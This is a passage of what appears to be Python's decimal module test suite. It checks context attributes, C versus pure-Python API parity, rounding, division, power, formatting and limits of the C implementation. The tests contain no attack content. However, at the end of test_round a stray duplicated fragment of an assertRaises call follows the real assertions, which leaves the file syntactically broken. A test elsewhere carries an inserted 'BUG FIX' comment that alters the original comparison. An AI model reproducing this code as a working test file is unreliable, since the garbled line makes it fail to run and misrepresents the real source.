                    if isinstance(traps, list):
                        traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
                    self.traps = traps

        c = Context()
        d = MyContext()
        for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
                     'flags', 'traps'):
            self.assertEqual(getattr(c, attr), getattr(d, attr))

        # prec
        self.assertRaises(ValueError, MyContext, **{'prec':-1})
        c = MyContext(prec=1)
        self.assertEqual(c.prec, 1)
        self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)

        # rounding
        self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
        c = MyContext(rounding=ROUND_DOWN, prec=1)
        self.assertEqual(c.rounding, ROUND_DOWN)
        self.assertEqual(c.plus(Decimal('9.9')), 9)

        # Emin
        self.assertRaises(ValueError, MyContext, **{'Emin':5})
        c = MyContext(Emin=-1, prec=1)
        self.assertEqual(c.Emin, -1)
        x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
        self.assertEqual(x, Decimal('0.0'))
        for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
            self.assertTrue(c.flags[signal])

        # Emax
        self.assertRaises(ValueError, MyContext, **{'Emax':-1})
        c = MyContext(Emax=1, prec=1)
        self.assertEqual(c.Emax, 1)
        self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
        if self.decimal == C:
            for signal in (Inexact, Overflow, Rounded):
                self.assertTrue(c.flags[signal])

        # capitals
        self.assertRaises(ValueError, MyContext, **{'capitals':-1})
        c = MyContext(capitals=0)
        self.assertEqual(c.capitals, 0)
        x = c.create_decimal('1E222')
        self.assertEqual(c.to_sci_string(x), '1e+222')

        # clamp
        self.assertRaises(ValueError, MyContext, **{'clamp':2})
        c = MyContext(clamp=1, Emax=99)
        self.assertEqual(c.clamp, 1)
        x = c.plus(Decimal('1e99'))
        self.assertEqual(str(x), '1.000000000000000000000000000E+99')

        # flags
        self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
        c = MyContext(flags=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.flags[signal])
        c.clear_flags()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.flags[signal])

        # traps
        self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
        c = MyContext(traps=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.traps[signal])
        c.clear_traps()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.traps[signal])

class CContextSubclassing(ContextSubclassing):
    decimal = C
class PyContextSubclassing(ContextSubclassing):
    decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
    # Cross-checks that the C (_decimal) and pure-Python (P) modules expose
    # the same public API surface.

    def test_module_attributes(self):
        # Architecture dependent context limits
        self.assertEqual(C.MAX_PREC, P.MAX_PREC)
        self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
        self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
        self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)

        self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
        self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)

        self.assertEqual(C.__version__, P.__version__)

        self.assertEqual(dir(C), dir(P))

    def test_context_attributes(self):
        x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())

    def test_decimal_attributes(self):
        x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        # BUG FIX: the second list was also built from C.Decimal(9), making
        # the comparison vacuous (set(x) - set(x) is always empty); the
        # intent -- as in test_context_attributes above -- is to compare the
        # C implementation against the pure-Python one.
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())

class Coverage(unittest.TestCase):

    def test_adjusted(self):
        Decimal = self.decimal.Decimal

        self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
        # XXX raise?
        self.assertEqual(Decimal('nan').adjusted(), 0)
        self.assertEqual(Decimal('inf').adjusted(), 0)

    def test_canonical(self):
        Decimal = self.decimal.Decimal
        getcontext = self.decimal.getcontext

        x = Decimal(9).canonical()
        self.assertEqual(x, 9)

        c = getcontext()
        x = c.canonical(Decimal(9))
        self.assertEqual(x, 9)

    def test_context_repr(self):
        c = self.decimal.DefaultContext.copy()

        c.prec = 425000000
        c.Emax = 425000000
        c.Emin = -425000000
        c.rounding = ROUND_HALF_DOWN
        c.capitals = 0
        c.clamp = 1
        for sig in OrderedSignals[self.decimal]:
            c.flags[sig] = False
            c.traps[sig] = False

        s = c.__repr__()
        t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
            "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
            "flags=[], traps=[])"
        self.assertEqual(s, t)

    def test_implicit_context(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            c.prec = 1
            c.Emax = 1
            c.Emin = -1

            # abs
            self.assertEqual(abs(Decimal("-10")), 10)
            # add
            self.assertEqual(Decimal("7") + 1, 8)
            # divide
            self.assertEqual(Decimal("10") / 5, 2)
            # divide_int
            self.assertEqual(Decimal("10") // 7, 1)
            # fma
            self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
            self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
            # three arg power
            self.assertEqual(pow(Decimal(10), 2, 7), 2)
            # exp
            self.assertEqual(Decimal("1.01").exp(), 3)
            # is_normal
            self.assertIs(Decimal("0.01").is_normal(), False)
            # is_subnormal
            self.assertIs(Decimal("0.01").is_subnormal(), True)
            # ln
            self.assertEqual(Decimal("20").ln(), 3)
            # log10
            self.assertEqual(Decimal("20").log10(), 1)
            # logb
            self.assertEqual(Decimal("580").logb(), 2)
            # logical_invert
            self.assertEqual(Decimal("10").logical_invert(), 1)
            # minus
            self.assertEqual(-Decimal("-10"), 10)
            # multiply
            self.assertEqual(Decimal("2") * 4, 8)
            # next_minus
            self.assertEqual(Decimal("10").next_minus(), 9)
            # next_plus
            self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
            # normalize
            self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
            # number_class
            self.assertEqual(Decimal("10").number_class(), '+Normal')
            # plus
            self.assertEqual(+Decimal("-1"), -1)
            # remainder
            self.assertEqual(Decimal("10") % 7, 3)
            # subtract
            self.assertEqual(Decimal("10") - 7, 3)
            # to_integral_exact
            self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)

            # Boolean functions
            self.assertTrue(Decimal("1").is_canonical())
            self.assertTrue(Decimal("1").is_finite())
            self.assertTrue(Decimal("1").is_finite())
            self.assertTrue(Decimal("snan").is_snan())
            self.assertTrue(Decimal("-1").is_signed())
            self.assertTrue(Decimal("0").is_zero())
            self.assertTrue(Decimal("0").is_zero())

        # Copy
        with localcontext() as c:
            c.prec = 10000
            x = 1228 ** 1523
            y = -Decimal(x)

            z = y.copy_abs()
            self.assertEqual(z, x)

            z = y.copy_negate()
            self.assertEqual(z, x)

            z = y.copy_sign(Decimal(1))
            self.assertEqual(z, x)

    def test_divmod(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero

        with localcontext() as c:
            q, r = divmod(Decimal("10912837129"), 1001)
            self.assertEqual(q, Decimal('10901935'))
            self.assertEqual(r, Decimal('194'))

            q, r = divmod(Decimal("NaN"), 7)
            self.assertTrue(q.is_nan() and r.is_nan())

            c.traps[InvalidOperation] = False
            q, r = divmod(Decimal("NaN"), 7)
            self.assertTrue(q.is_nan() and r.is_nan())

            c.traps[InvalidOperation] = False
            c.clear_flags()
            q, r = divmod(Decimal("inf"), Decimal("inf"))
            self.assertTrue(q.is_nan() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            q, r = divmod(Decimal("inf"), 101)
            self.assertTrue(q.is_infinite() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            q, r = divmod(Decimal(0), 0)
            self.assertTrue(q.is_nan() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])

            c.traps[DivisionByZero] = False
            c.clear_flags()
            q, r = divmod(Decimal(11), 0)
            self.assertTrue(q.is_infinite() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation] and
                            c.flags[DivisionByZero])

    def test_power(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        Overflow = self.decimal.Overflow
        Rounded = self.decimal.Rounded

        with localcontext() as c:
            c.prec = 3
            c.clear_flags()
            self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
            self.assertTrue(c.flags[Rounded])

            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            c.clear_flags()
            c.traps[Overflow] = False
            self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
            self.assertTrue(c.flags[Overflow])

    def test_quantize(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation

        with localcontext() as c:
            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            c.traps[InvalidOperation] = False
            x = Decimal(99).quantize(Decimal("1e1"))
            self.assertTrue(x.is_nan())

    def test_radix(self):
        Decimal = self.decimal.Decimal
        getcontext = self.decimal.getcontext

        c = getcontext()
        self.assertEqual(Decimal("1").radix(), 10)
        self.assertEqual(c.radix(), 10)

    def test_rop(self):
        Decimal = self.decimal.Decimal

        for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
                     '__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
            self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)

    def test_round(self):
        # Python3 behavior: round() returns Decimal
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            c.prec = 28

            self.assertEqual(str(Decimal("9.99").__round__()), "10")
            self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
            self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
            self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
            self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")

            self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
            self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
Decimal("1.23").__round__, "5") self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8) def test_create_decimal(self): c = self.decimal.Context() self.assertRaises(ValueError, c.create_decimal, ["%"]) def test_int(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext with localcontext() as c: c.prec = 9999 x = Decimal(1221**1271) / 10**3923 self.assertEqual(int(x), 1) self.assertEqual(x.to_integral(), 2) def test_copy(self): Context = self.decimal.Context c = Context() c.prec = 10000 x = -(1172 ** 1712) y = c.copy_abs(x) self.assertEqual(y, -x) y = c.copy_negate(x) self.assertEqual(y, -x) y = c.copy_sign(x, 1) self.assertEqual(y, -x) class CCoverage(Coverage): decimal = C class PyCoverage(Coverage): decimal = P class PyFunctionality(unittest.TestCase): """Extra functionality in decimal.py""" def test_py_alternate_formatting(self): # triples giving a format, a Decimal, and the expected result Decimal = P.Decimal localcontext = P.localcontext test_values = [ # Issue 7094: Alternate formatting (specified by #) ('.0e', '1.0', '1e+0'), ('#.0e', '1.0', '1.e+0'), ('.0f', '1.0', '1'), ('#.0f', '1.0', '1.'), ('g', '1.1', '1.1'), ('#g', '1.1', '1.1'), ('.0g', '1', '1'), ('#.0g', '1', '1.'), ('.0%', '1.0', '100%'), ('#.0%', '1.0', '100.%'), ] for fmt, d, result in test_values: self.assertEqual(format(Decimal(d), fmt), result) class PyWhitebox(unittest.TestCase): """White box testing for decimal.py""" def test_py_exact_power(self): # Rarely exercised lines in _power_exact. 
Decimal = P.Decimal localcontext = P.localcontext with localcontext() as c: c.prec = 8 x = Decimal(2**16) ** Decimal("-0.5") self.assertEqual(x, Decimal('0.00390625')) x = Decimal(2**16) ** Decimal("-0.6") self.assertEqual(x, Decimal('0.0012885819')) x = Decimal("256e7") ** Decimal("-0.5") x = Decimal(152587890625) ** Decimal('-0.0625') self.assertEqual(x, Decimal("0.2")) x = Decimal("152587890625e7") ** Decimal('-0.0625') x = Decimal(5**2659) ** Decimal('-0.0625') c.prec = 1 x = Decimal("152587890625") ** Decimal('-0.5') c.prec = 201 x = Decimal(2**578) ** Decimal("-0.5") def test_py_immutability_operations(self): # Do operations and check that it didn't change internal objects. Decimal = P.Decimal DefaultContext = P.DefaultContext setcontext = P.setcontext c = DefaultContext.copy() c.traps = dict((s, 0) for s in OrderedSignals[P]) setcontext(c) d1 = Decimal('-25e55') b1 = Decimal('-25e55') d2 = Decimal('33e+33') b2 = Decimal('33e+33') def checkSameDec(operation, useOther=False): if useOther: eval("d1." + operation + "(d2)") self.assertEqual(d1._sign, b1._sign) self.assertEqual(d1._int, b1._int) self.assertEqual(d1._exp, b1._exp) self.assertEqual(d2._sign, b2._sign) self.assertEqual(d2._int, b2._int) self.assertEqual(d2._exp, b2._exp) else: eval("d1." 
+ operation + "()") self.assertEqual(d1._sign, b1._sign) self.assertEqual(d1._int, b1._int) self.assertEqual(d1._exp, b1._exp) Decimal(d1) self.assertEqual(d1._sign, b1._sign) self.assertEqual(d1._int, b1._int) self.assertEqual(d1._exp, b1._exp) checkSameDec("__abs__") checkSameDec("__add__", True) checkSameDec("__divmod__", True) checkSameDec("__eq__", True) checkSameDec("__ne__", True) checkSameDec("__le__", True) checkSameDec("__lt__", True) checkSameDec("__ge__", True) checkSameDec("__gt__", True) checkSameDec("__float__") checkSameDec("__floordiv__", True) checkSameDec("__hash__") checkSameDec("__int__") checkSameDec("__trunc__") checkSameDec("__mod__", True) checkSameDec("__mul__", True) checkSameDec("__neg__") checkSameDec("__bool__") checkSameDec("__pos__") checkSameDec("__pow__", True) checkSameDec("__radd__", True) checkSameDec("__rdivmod__", True) checkSameDec("__repr__") checkSameDec("__rfloordiv__", True) checkSameDec("__rmod__", True) checkSameDec("__rmul__", True) checkSameDec("__rpow__", True) checkSameDec("__rsub__", True) checkSameDec("__str__") checkSameDec("__sub__", True) checkSameDec("__truediv__", True) checkSameDec("adjusted") checkSameDec("as_tuple") checkSameDec("compare", True) checkSameDec("max", True) checkSameDec("min", True) checkSameDec("normalize") checkSameDec("quantize", True) checkSameDec("remainder_near", True) checkSameDec("same_quantum", True) checkSameDec("sqrt") checkSameDec("to_eng_string") checkSameDec("to_integral") def test_py_decimal_id(self): Decimal = P.Decimal d = Decimal(45) e = Decimal(d) self.assertEqual(str(e), '45') self.assertNotEqual(id(d), id(e)) def test_py_rescale(self): # Coverage Decimal = P.Decimal localcontext = P.localcontext with localcontext() as c: x = Decimal("NaN")._rescale(3, ROUND_UP) self.assertTrue(x.is_nan()) def test_py__round(self): # Coverage Decimal = P.Decimal self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP) class CFunctionality(unittest.TestCase): """Extra 
functionality in _decimal""" @requires_extra_functionality def test_c_ieee_context(self): # issue 8786: Add support for IEEE 754 contexts to decimal module. IEEEContext = C.IEEEContext DECIMAL32 = C.DECIMAL32 DECIMAL64 = C.DECIMAL64 DECIMAL128 = C.DECIMAL128 def assert_rest(self, context): self.assertEqual(context.clamp, 1) assert_signals(self, context, 'traps', []) assert_signals(self, context, 'flags', []) c = IEEEContext(DECIMAL32) self.assertEqual(c.prec, 7) self.assertEqual(c.Emax, 96) self.assertEqual(c.Emin, -95) assert_rest(self, c) c = IEEEContext(DECIMAL64) self.assertEqual(c.prec, 16) self.assertEqual(c.Emax, 384) self.assertEqual(c.Emin, -383) assert_rest(self, c) c = IEEEContext(DECIMAL128) self.assertEqual(c.prec, 34) self.assertEqual(c.Emax, 6144) self.assertEqual(c.Emin, -6143) assert_rest(self, c) # Invalid values self.assertRaises(OverflowError, IEEEContext, 2**63) self.assertRaises(ValueError, IEEEContext, -1) self.assertRaises(ValueError, IEEEContext, 1024) @requires_extra_functionality def test_c_context(self): Context = C.Context c = Context(flags=C.DecClamped, traps=C.DecRounded) self.assertEqual(c._flags, C.DecClamped) self.assertEqual(c._traps, C.DecRounded) @requires_extra_functionality def test_constants(self): # Condition flags cond = ( C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero, C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError, C.DecInexact, C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError, C.DecFloatOperation, C.DecOverflow, C.DecRounded, C.DecSubnormal, C.DecUnderflow ) # IEEEContext self.assertEqual(C.DECIMAL32, 32) self.assertEqual(C.DECIMAL64, 64) self.assertEqual(C.DECIMAL128, 128) self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512) # Conditions for i, v in enumerate(cond): self.assertEqual(v, 1<<i) self.assertEqual(C.DecIEEEInvalidOperation, C.DecConversionSyntax| C.DecDivisionImpossible| C.DecDivisionUndefined| C.DecFpuError| C.DecInvalidContext| C.DecInvalidOperation| C.DecMallocError) 
self.assertEqual(C.DecErrors, C.DecIEEEInvalidOperation| C.DecDivisionByZero) self.assertEqual(C.DecTraps, C.DecErrors|C.DecOverflow|C.DecUnderflow) class CWhitebox(unittest.TestCase): """Whitebox testing for _decimal""" def test_bignum(self): # Not exactly whitebox, but too slow with pydecimal. Decimal = C.Decimal localcontext = C.localcontext b1 = 10**35 b2 = 10**36 with localcontext() as c: c.prec = 1000000 for i in range(5): a = random.randrange(b1, b2) b = random.randrange(1000, 1200) x = a ** b y = Decimal(a) ** Decimal(b) self.assertEqual(x, y) def test_invalid_construction(self): self.assertRaises(TypeError, C.Decimal, 9, "xyz") def test_c_input_restriction(self): # Too large for _decimal to be converted exactly Decimal = C.Decimal InvalidOperation = C.InvalidOperation Context = C.Context localcontext = C.localcontext with localcontext(Context()): self.assertRaises(InvalidOperation, Decimal, "1e9999999999999999999") def test_c_context_repr(self): # This test is _decimal-only because flags are not printed # in the same order. 
DefaultContext = C.DefaultContext FloatOperation = C.FloatOperation c = DefaultContext.copy() c.prec = 425000000 c.Emax = 425000000 c.Emin = -425000000 c.rounding = ROUND_HALF_DOWN c.capitals = 0 c.clamp = 1 for sig in OrderedSignals[C]: c.flags[sig] = True c.traps[sig] = True c.flags[FloatOperation] = True c.traps[FloatOperation] = True s = c.__repr__() t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \ "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \ "flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \ "FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \ "traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \ "FloatOperation, Overflow, Rounded, Subnormal, Underflow])" self.assertEqual(s, t) def test_c_context_errors(self): Context = C.Context InvalidOperation = C.InvalidOperation Overflow = C.Overflow FloatOperation = C.FloatOperation localcontext = C.localcontext getcontext = C.getcontext setcontext = C.setcontext HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) c = Context() # SignalDict: input validation self.assertRaises(KeyError, c.flags.__setitem__, 801, 0) self.assertRaises(KeyError, c.traps.__setitem__, 801, 0) self.assertRaises(ValueError, c.flags.__delitem__, Overflow) self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation) self.assertRaises(TypeError, setattr, c, 'flags', ['x']) self.assertRaises(TypeError, setattr, c,'traps', ['y']) self.assertRaises(KeyError, setattr, c, 'flags', {0:1}) self.assertRaises(KeyError, setattr, c, 'traps', {0:1}) # Test assignment from a signal dict with the correct length but # one invalid key. 
d = c.flags.copy() del d[FloatOperation] d["XYZ"] = 91283719 self.assertRaises(KeyError, setattr, c, 'flags', d) self.assertRaises(KeyError, setattr, c, 'traps', d) # Input corner cases int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1 gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9 # prec, Emax, Emin for attr in ['prec', 'Emax']: self.assertRaises(ValueError, setattr, c, attr, gt_max_emax) self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax) # prec, Emax, Emin in context constructor self.assertRaises(ValueError, Context, prec=gt_max_emax) self.assertRaises(ValueError, Context, Emax=gt_max_emax) self.assertRaises(ValueError, Context, Emin=-gt_max_emax) # Overflow in conversion self.assertRaises(OverflowError, Context, prec=int_max+1) self.assertRaises(OverflowError, Context, Emax=int_max+1) self.assertRaises(OverflowError, Context, Emin=-int_max-2) self.assertRaises(OverflowError, Context, clamp=int_max+1) self.assertRaises(OverflowError, Context, capitals=int_max+1) # OverflowError, general ValueError for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'): self.assertRaises(OverflowError, setattr, c, attr, int_max+1) self.assertRaises(OverflowError, setattr, c, attr, -int_max-2) if sys.platform != 'win32': self.assertRaises(ValueError, setattr, c, attr, int_max) self.assertRaises(ValueError, setattr, c, attr, -int_max-1) # OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax if C.MAX_PREC == 425000000: self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'), int_max+1) self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'), int_max+1) self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'), -int_max-2) # ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax if C.MAX_PREC == 425000000: self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0) self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 1070000001) self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1) 
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), 1070000001) self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), -1070000001) self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1) # capitals, clamp for attr in ['capitals', 'clamp']: self.assertRaises(ValueError, setattr, c, attr, -1) self.assertRaises(ValueError, setattr, c, attr, 2) self.assertRaises(TypeError, setattr, c, attr, [1,2,3]) if HAVE_CONFIG_64: self.assertRaises(ValueError, setattr, c, attr, 2**32) self.assertRaises(ValueError, setattr, c, attr, 2**32+1) # Invalid local context self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass', locals()) self.assertRaises(TypeError, exec, 'with localcontext(context=getcontext()): pass', locals()) # setcontext saved_context = getcontext() self.assertRaises(TypeError, setcontext, "xyz") setcontext(saved_context) def test_rounding_strings_interned(self): self.assertIs(C.ROUND_UP, P.ROUND_UP) self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN) self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING) self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR) self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP) self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN) self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN) self.assertIs(C.ROUND_05UP, P.ROUND_05UP) @requires_extra_functionality def test_c_context_errors_extra(self): Context = C.Context InvalidOperation = C.InvalidOperation Overflow = C.Overflow localcontext = C.localcontext getcontext = C.getcontext setcontext = C.setcontext HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) c = Context() # Input corner cases int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1 # OverflowError, general ValueError self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1) self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2) if sys.platform != 'win32': self.assertRaises(ValueError, setattr, c, '_allcr', int_max) self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1) # OverflowError, general TypeError for attr 
in ('_flags', '_traps'): self.assertRaises(OverflowError, setattr, c, attr, int_max+1) self.assertRaises(OverflowError, setattr, c, attr, -int_max-2) if sys.platform != 'win32': self.assertRaises(TypeError, setattr, c, attr, int_max) self.assertRaises(TypeError, setattr, c, attr, -int_max-1) # _allcr self.assertRaises(ValueError, setattr, c, '_allcr', -1) self.assertRaises(ValueError, setattr, c, '_allcr', 2) self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3]) if HAVE_CONFIG_64: self.assertRaises(ValueError, setattr, c, '_allcr', 2**32) self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1) # _flags, _traps for attr in ['_flags', '_traps']: self.assertRaises(TypeError, setattr, c, attr, 999999) self.assertRaises(TypeError, setattr, c, attr, 'x') def test_c_valid_context(self): # These tests are for code coverage in _decimal. DefaultContext = C.DefaultContext Clamped = C.Clamped Underflow = C.Underflow Inexact = C.Inexact Rounded = C.Rounded Subnormal = C.Subnormal c = DefaultContext.copy() # Exercise all getters and setters c.prec = 34 c.rounding = ROUND_HALF_UP c.Emax = 3000 c.Emin = -3000 c.capitals = 1 c.clamp = 0 self.assertEqual(c.prec, 34) self.assertEqual(c.rounding, ROUND_HALF_UP) self.assertEqual(c.Emin, -3000) self.assertEqual(c.Emax, 3000) self.assertEqual(c.capitals, 1) self.assertEqual(c.clamp, 0) self.assertEqual(c.Etiny(), -3033) self.assertEqual(c.Etop(), 2967) # Exercise all unsafe setters if C.MAX_PREC == 425000000: c._unsafe_setprec(999999999) c._unsafe_setemax(999999999) c._unsafe_setemin(-999999999) self.assertEqual(c.prec, 999999999) self.assertEqual(c.Emax, 999999999) self.assertEqual(c.Emin, -999999999) @requires_extra_functionality def test_c_valid_context_extra(self): DefaultContext = C.DefaultContext c = DefaultContext.copy() self.assertEqual(c._allcr, 1) c._allcr = 0 self.assertEqual(c._allcr, 0) def test_c_round(self): # Restricted input. 
Decimal = C.Decimal InvalidOperation = C.InvalidOperation localcontext = C.localcontext MAX_EMAX = C.MAX_EMAX MIN_ETINY = C.MIN_ETINY int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1 with localcontext() as c: c.traps[InvalidOperation] = True self.assertRaises(InvalidOperation, Decimal("1.23").__round__, -int_max-1) self.assertRaises(InvalidOperation, Decimal("1.23").__round__, int_max) self.assertRaises(InvalidOperation, Decimal("1").__round__, int(MAX_EMAX+1)) self.assertRaises(C.InvalidOperation, Decimal("1").__round__, -int(MIN_ETINY-1)) self.assertRaises(OverflowError, Decimal("1.23").__round__, -int_max-2) self.assertRaises(OverflowError, Decimal("1.23").__round__, int_max+1) def test_c_format(self): # Restricted input Decimal = C.Decimal HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9) self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9) self.assertRaises(TypeError, Decimal(1).__format__, []) self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10") maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1 self.assertRaises(ValueError, Decimal("1.23456789").__format__, "=%d.1" % maxsize) def test_c_integral(self): Decimal = C.Decimal Inexact = C.Inexact localcontext = C.localcontext x = Decimal(10) self.assertEqual(x.to_integral(), 10) self.assertRaises(TypeError, x.to_integral, '10') self.assertRaises(TypeError, x.to_integral, 10, 'x') self.assertRaises(TypeError, x.to_integral, 10) self.assertEqual(x.to_integral_value(), 10) self.assertRaises(TypeError, x.to_integral_value, '10') self.assertRaises(TypeError, x.to_integral_value, 10, 'x') self.assertRaises(TypeError, x.to_integral_value, 10) self.assertEqual(x.to_integral_exact(), 10) self.assertRaises(TypeError, x.to_integral_exact, '10') self.assertRaises(TypeError, x.to_integral_exact, 10, 'x') self.assertRaises(TypeError, x.to_integral_exact, 10) with localcontext() as c: x = 
Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP) self.assertEqual(x, Decimal('100000000000000000000000000')) x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP) self.assertEqual(x, Decimal('100000000000000000000000000')) c.traps[Inexact] = True self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP) def test_c_funcs(self): # Invalid arguments Decimal = C.Decimal InvalidOperation = C.InvalidOperation DivisionByZero = C.DivisionByZero getcontext = C.getcontext localcontext = C.localcontext self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9') self.assertRaises(TypeError, pow, Decimal(1), 2, "3") self.assertRaises(TypeError, Decimal(9).number_class, "x", "y") self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y") self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), [] ) self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext() ) self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), 10 ) self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000 ) with localcontext() as c: c.clear_traps() # Invalid arguments self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y") self.assertRaises(TypeError, c.canonical, 200) self.assertRaises(TypeError, c.is_canonical, 200) self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y") self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y") self.assertEqual(str(c.canonical(Decimal(200))), '200') self.assertEqual(c.radix(), 10) c.traps[DivisionByZero] = True self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0) self.assertRaises(DivisionByZero, c.divmod, 9, 0) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() c.traps[InvalidOperation] = True self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0) self.assertRaises(InvalidOperation, c.divmod, 9, 0) self.assertTrue(c.flags[DivisionByZero]) 
